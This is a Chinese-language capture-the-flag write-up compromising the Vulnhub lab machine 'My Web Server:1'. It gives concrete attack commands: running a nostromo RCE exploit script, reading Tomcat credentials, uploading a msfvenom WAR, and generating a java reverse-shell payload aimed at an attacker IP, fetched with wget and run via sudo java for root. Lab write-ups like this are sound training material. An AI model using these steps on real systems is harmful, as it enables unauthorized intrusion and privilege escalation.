CTF_Vulnhub My Web Server:1—Writeup
Get Box:https://www.[vulnhub.com/entry/my-web-server-1,463/](http://vulnhub.com/entry/my-web-server-1,463/)
下载好OVF后直接导入虚拟机即可
不错可以直接看到IP,那么就打开kali linux开始吧
打开卡里二话不说直接一顿NMAP
可以很清楚的看到22,80,2222,3306,8009,8080,还有8081端口开放
查看80端口 还有8080 80801 2222
随便尝试一下看看是否存在默认密码等
很明显失败了
再看看8081端口
类似于一个博客吧
再看看2222端口
哦天呐太多好看的小姐姐了吧
也是一个类似博客的网页
那么现在就直接进入正题吧通过dirb nikto searchsploit等工具的信息收集发现searchsploit发现2222号端口的nostromo1.9.6有远程代码执行漏洞
dirb大量的扫描结果
nikto扫描结果
Searchsploit扫描结果
关于这个nostromo我在看雪论坛也发现一篇翻译的文章 有兴趣可以去看看(https://bbs.[pediy.com/thread-256798.htm)](http://pediy.com/thread-256798.htm))
首先cp
直接python会报错 我开始还以为是程序问题 后来发现直接注释掉就行
用法比较简单就是IP 端口 命令
先试试python 47837.py 192.168.0.100 2222 whoami
python 47837.py 192.168.0.100 2222 id
那么先GETSHELL吧
用kali自带的
改自己卡里IP和你要的端口 随意奥
启动阿帕奇
Nc start
然后python -c import“pty;pty.spawn(‘/bin/bash’)
通过查看tomcat-users.xml可以发现TOMCAT的管理后台密码
msfvenom生成一个war
然后上传即可
然后访问http://192.168.0.100:8080/exp/
现在已经切换到了TOMCAT用户 其实本来不想这么麻烦的 只是我试了一下直接切换TOMCAT用户 能用到的密码都失败了
Sudo -l
msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.108 LPORT=7775 -f jar > expjar.jar
启动NC监听并把生成的jar复制到var/www/html目录下
Wget http://192.168.0.108/expjar.jar
然后sudo /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java -jar ./expjar.jar